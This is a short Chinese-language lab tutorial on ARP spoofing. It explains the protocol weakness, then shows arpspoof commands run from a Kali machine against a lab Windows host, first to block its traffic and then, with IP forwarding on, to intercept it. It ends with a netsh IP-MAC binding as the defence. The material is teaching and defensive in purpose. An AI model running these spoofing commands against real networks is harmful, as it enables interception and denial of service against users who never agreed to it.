一、什么是ARP

ARP欺骗是一种针对以太网地址解析协议（ARP）的攻击技术，通过伪造ARP数据包来篡改目标计算机的ARP缓存，实现中间人攻击或拒绝服务攻击。

ARP协议的基本功能是通过目标设备的IP地址查询其MAC地址，以保证网络通信的顺利进行。然而，ARP协议在设计时并未充分考虑安全性，攻击者可以利用这一弱点进行ARP欺骗攻击。攻击者通过发送假冒的ARP响应包，将目标主机ARP缓存中的网关MAC地址替换为攻击者的MAC地址。这样，目标主机发出的所有数据包都会被错误地发送到攻击者的机器，攻击者可以对这些数据包进行嗅探、篡改甚至直接丢弃，从而实现中间人攻击或拒绝服务攻击

二、模拟ARP攻击

信息收集

被攻击主机windows server2012

ip：192.168.93.143        MAC:00-50-56-c0-00-08     

攻击主机 kali

ip：192.168.93.188        MAC：00:0c:29:ed:ac:0a

网关

ip：192.168.93.2          MAC：00-50-56-ea-7a-d6    

①Kali发起arp攻击，让被攻击主机无法上网

arpspoof -i eth0 -t 192.168.93.143 192.168.93.2

②截取主机数据，被攻击主机可以上网

1.在kali上开启ipv4转发

echo 1 >/proc/sys/net/ipv4/ip_forward

关闭转发

echo 0 >/proc/sys/net/ipv4/ip_forward

2.arpspoof -i eth0 -t 192.168.93.143 192.168.93.2

三、防御ARP攻击

应对方法：Window-----Ip-mac绑定

netsh -c "i i"  add neighbors 12 "192.168.93.2" "00-50-56-ea-7a-d6"

删除规则

netsh -c "i i"  del neighbors 12 "192.168.93.2" "00-50-56-ea-7a-d6"